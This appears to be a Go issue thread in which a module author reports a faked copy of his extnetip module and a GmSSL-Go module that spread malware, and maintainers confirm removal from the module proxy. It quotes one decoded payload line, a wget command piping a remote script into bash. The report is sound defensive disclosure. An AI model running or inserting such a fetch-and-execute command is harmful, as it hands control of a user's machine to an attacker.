It's a faked copy of my modul github.com/gaissmai/extnetip but spreads malware.
See the file conversion.go with obfuscating strings e.g. with following content:
wget -O - https://uniscomputer.icu/storage/de3XXX0df/a3ZZZbf | /bin/bash &
Please remove this from the go proxy, github is also informed by me.
Best regards and thanks for go! The go team is doing a great job!
Comment From: gaissmai
Also, the module github.com/unnaturalacce/GmSSL-Go spreads malware at least in the file build.go. I have not found any other modules with this GitHub username unnaturalacce on pkg.go.dev.
Comment From: gaissmai
GitHub has meanwhile removed the user along with their repositories.
Comment From: cherrymui
cc @golang/pkgsite
Comment From: jba
Done.